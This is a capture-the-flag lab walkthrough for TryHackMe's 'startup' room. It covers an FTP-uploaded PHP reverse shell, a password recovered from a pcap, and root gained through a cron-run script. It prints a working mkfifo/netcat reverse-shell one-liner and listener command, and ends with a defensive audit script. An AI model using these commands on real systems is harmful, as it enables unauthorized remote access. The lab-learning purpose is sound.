TryHackMe CTF: startup (Easy)

Leverages a writable anonymous FTP directory to upload and execute a PHP reverse shell. Gains user access by extracting a password from a pcap file. Achieves root by exploiting a scheduled script with writable dependencies.

URL: https://tryhackme.com/room/startup   Easy

PHASE 1: Reconnaissance

Description of the room:

We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren’t sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!

PHASE 2: Scanning & Enumeration

Running: nmap

Ran the following:

nmap -sC -sV x.x.x.x

Interesting ports found to be open:

PORT   STATE SERVICE REASON
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Anonymous FTP has an Among Us meme, and a text file telling people to stop leaving memes on that file share. The ftp folder is writable. That could be something?

Also see: nmap.log

Running: gobuster

Ran the following:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://x.x.x.x

Interesting folders found:

/files                (Status: 301) [Size: 312] [--> http://10.10.159.60/files/]

Also see: gobuster.log

Running: nikto

Ran the following:

nikto -h x.x.x.x

Nothing interesting found.

Also see: nikto.log

PHASE 3: Gaining Access

Unprivileged Access

Since the anonymous FTP folder /ftp/ is writable, you can upload revshell.php with FTP's put command, and then trigger that reverse shell by browsing to the /files/revshell.php URL (the FTP root is served by the web server under /files/).

That will get you a primitive shell running as the www-data user.

Privilege Escalation (power user)

First, to privesc into the lennie account (you can see their home folder under /home/), look in the incidents folder for a pcap file. If you download that file and view it with Wireshark, you can see there was a password attempt. It was a bad password attempt for www-data, but that IS the password for lennie.

Meaning, you can now do su - lennie with that newly found password. You are now logged in as lennie.

Privilege Escalation (root)

The hint from TryHackMe for root privesc is “scripts”. Well, in Lennie’s home folder there is a ~/scripts/ folder. In there is a bash script that calls /etc/print.sh. In short, it looks like something external (presumably a root cron job) kicks off that script, but we can’t see what it is from here.

So, we modify /etc/print.sh to reverse shell back to our workstation by adding something like:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 8080 >/tmp/f

and then listen on your workstation with something like this:

nc -lvnp 8080

After a minute or so, you’ve got a prompt, and it’s a root prompt!
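The root step works only because a script that root runs on a schedule calls /etc/print.sh, a file a low-privileged user can modify. As an added example that is not part of the original writeup, the audit helper below checks the files a scheduled script references for exactly that weakness; every path and sample file it creates is constructed for the demo.

```shell
#!/bin/sh
# Added audit helper, not code from the original writeup. Given a script that
# a privileged process (e.g. a root cron job) runs, list every absolute path it
# references and flag the ones a low-privileged user could alter: the file is
# group/world-writable, or it sits in a world-writable directory without the
# sticky bit and could simply be replaced. All sample paths are constructed.

# Octal permission bits of a path (GNU stat, as on the Ubuntu target; -L follows symlinks).
perm_of() { stat -L -c '%a' "$1"; }

# Print "<path> <reason>" for each referenced regular file others may modify.
writable_deps() {
    grep -oE '/[A-Za-z0-9_./-]+' "$1" | sort -u | while read -r dep; do
        [ -f "$dep" ] || continue
        mode=$(perm_of "$dep")
        if [ $(( 0$mode & 022 )) -ne 0 ]; then      # g+w or o+w on the file
            echo "$dep file-writable-by-others(mode $mode)"
            continue
        fi
        dmode=$(perm_of "$(dirname "$dep")")
        if [ $(( 0$dmode & 02 )) -ne 0 ] && [ $(( 0$dmode & 01000 )) -eq 0 ]; then
            echo "$dep replaceable-in-dir(mode $dmode)"   # o+w dir, no sticky
        fi
    done
}

# Constructed sample: a caller script (like the one in ~/scripts/ on the box)
# that runs three helpers: one locked down, one world-writable, one in a 777 dir.
make_sample() {
    base=$(mktemp -d)
    mkdir -m 755 "$base/etc"; mkdir -m 777 "$base/drop"
    printf '#!/bin/bash\necho hi\n' > "$base/etc/print.sh";   chmod 666 "$base/etc/print.sh"
    printf '#!/bin/bash\necho ok\n' > "$base/etc/safe.sh";    chmod 644 "$base/etc/safe.sh"
    printf '#!/bin/bash\necho x\n'  > "$base/drop/helper.sh"; chmod 644 "$base/drop/helper.sh"
    printf '#!/bin/bash\n%s\n%s\n%s\n' "$base/etc/print.sh" "$base/etc/safe.sh" \
        "$base/drop/helper.sh" > "$base/planner.sh"
    echo "$base/planner.sh"
}

# Demo run: reports print.sh and helper.sh, but not safe.sh.
writable_deps "$(make_sample)"
```

Run it against the real caller script (for example the one under ~/scripts/) as the low-privileged user; anything it reports is a file root will execute that that user can rewrite.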